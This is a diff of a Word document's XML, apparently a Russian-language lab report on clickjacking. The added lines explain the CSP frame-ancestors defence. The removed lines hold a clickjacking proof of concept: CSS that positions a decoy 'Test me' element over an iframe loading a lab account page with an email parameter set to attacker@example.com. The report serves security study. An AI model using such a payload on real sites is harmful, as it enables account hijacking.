+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>frame</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ancestors</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> в заголовке </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Content</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Security</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Policy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>CSP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>). Она позволяет точно указать, какие сайты могут быть «родителями» для фрейма</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>        position:absolute;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        </w:t>
-      </w:r>
-      <w:r>
-        <w:t>top:385</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>px;   </w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>     /* позиция текста по вертикали */</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
-      </w:pPr>
-      <w:r>
-        <w:t>        left:80</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>px;   </w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>     /* позиция текста по горизонтали */</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>z-index:1;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>        font-family:system-ui,Segoe UI,Roboto,Arial,sans-serif;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>        padding:12px 20px;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>        background:#22c55e;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>        color:#022c22;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>        border-radius:999px;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>        font-weight:700;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>        cursor:pointer;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>    }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>&lt;/style&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>&lt;div&gt;Test me&lt;/div&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>&lt;iframe sandbox="allow-forms"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>        src="http://62.173.140.174:36108/my-account?email=attacker@example.com"&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
-      </w:pPr>
-      <w:r>
-        <w:t>&lt;/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>iframe</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&gt;</w:t>
-      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -449,6 +1811,103 @@
     </w:sectPr>
   </w:body>
 </w:document>
+</file>
+
+<file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
+  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="52665735"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="847601F0"/>
+    <w:lvl w:ilvl="0" w:tplc="0419000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0419000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0419000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:num w:numId="1">
+    <w:abstractNumId w:val="0"/>
+  </w:num>
+</w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
@@ -872,6 +2331,17 @@
     <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="a3">
+    <w:name w:val="List Paragraph"/>
+    <w:basedOn w:val="a"/>
+    <w:uiPriority w:val="34"/>
+    <w:qFormat/>
+    <w:rsid w:val="00C81C0C"/>
+    <w:pPr>
+      <w:ind w:left="720"/>
+      <w:contextualSpacing/>
+    </w:pPr>
+  </w:style>
 </w:styles>
 </file>
 
